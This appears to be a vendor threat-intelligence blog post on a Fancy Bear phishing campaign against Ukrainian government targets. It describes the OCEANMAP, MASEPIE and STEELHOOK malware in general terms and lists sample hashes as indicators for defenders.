Related Families: OCEANMAP, MASEPIE, STEELHOOK
Verticals Targeted: Government
Executive Summary
Fancy Bear was recently observed engaging in a phishing campaign targeting entities in Ukraine. In the campaign, the threat actors used three never before seen malware families, OCEANMAP, MASEPIE, and STEELHOOK.
Key Takeaways
- Fancy Bear was recently observed engaging in a phishing campaign targeting entities in Ukraine.
- In the campaign, the threat actors used three never before seen malware families, OCEANMAP, MASEPIE, and STEELHOOK.
- OCEANMAP is a C#-based backdoor used to execute commands via cmd.exe.
- MASEPIE is a Python tool used for uploading files and executing commands.
- STEELHOOK is a PowerShell script capable of stealing internet browser data and the DPAPI master key.
The Campaign
Fancy Bear was recently observed engaging in a phishing campaign targeting entities in Ukraine. In the campaign, the threat actors used three never before seen malware families, OCEANMAP, MASEPIE, and STEELHOOK. The objective of the campaign appears to be espionage. CERT-UA reported on this activity. A synopsis of the activity in English was provided by Security Affairs.
The attacks, which took place in December 2023, targeted government entities. The phishing emails used in the campaign attempted to trick the victim into clicking on an embedded link to view a document. When the victim clicked the link, they were redirected to a web resource that resulted in the download of an LNK file. Upon opening the LNK file, a PowerShell command downloads a decoy document and MASEPIE, a Client.py file.
The Malware
MASEPIE
MASEPIE is a Python tool capable of uploading and unloading files and executing commands. It communicates with the C2 via encrypted traffic. The backdoor sets up a SysUpdate key in the registry to maintain persistence, placing an LNK file named SystemUpdate.lnk in the startup directory. Finally, MASEPIE is used to download and execute OPENSSH, STEELHOOK, and OCEANMAP.
OCEANMAP
OCEANMAP is a C# based tool that acts as a backdoor. It executes commands using cmd.exe and uses IMAP as a control channel. Commands are base64 encoded and are stored in the Drafts folder of email mailboxes.
STEELHOOK
STEELHOOK is a PowerShell script capable of stealing internet browser data, as well as the DPAPI master key.
Who is Fancy Bear?
Fancy Bear, also known as APT28, Pawnstorm, SnakeMackerel, Forest Blizzard, Strontium, Sednit, Sofacy, and Tsar Team, is a Russia nexus APT group associated with Unit 26165 of the Russian intelligence entity known as the GRU. The group has been active since at least 2007 and targets government, military, and security entities.
IOCs
PolySwarm has multiple samples associated with this activity.
18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6
24fd571600dcc00bf2bb8577c7e4fd67275f7d19d852b909395bebcbb1274e04
19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc
593583b312bf48b7748f4372e6f4a560fd38e969399cf2a96798e2594a517bf4
You can use the following CLI command to search for these and other Fancy Bear samples in our portal:
$ polyswarm link list -t FancyBear
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.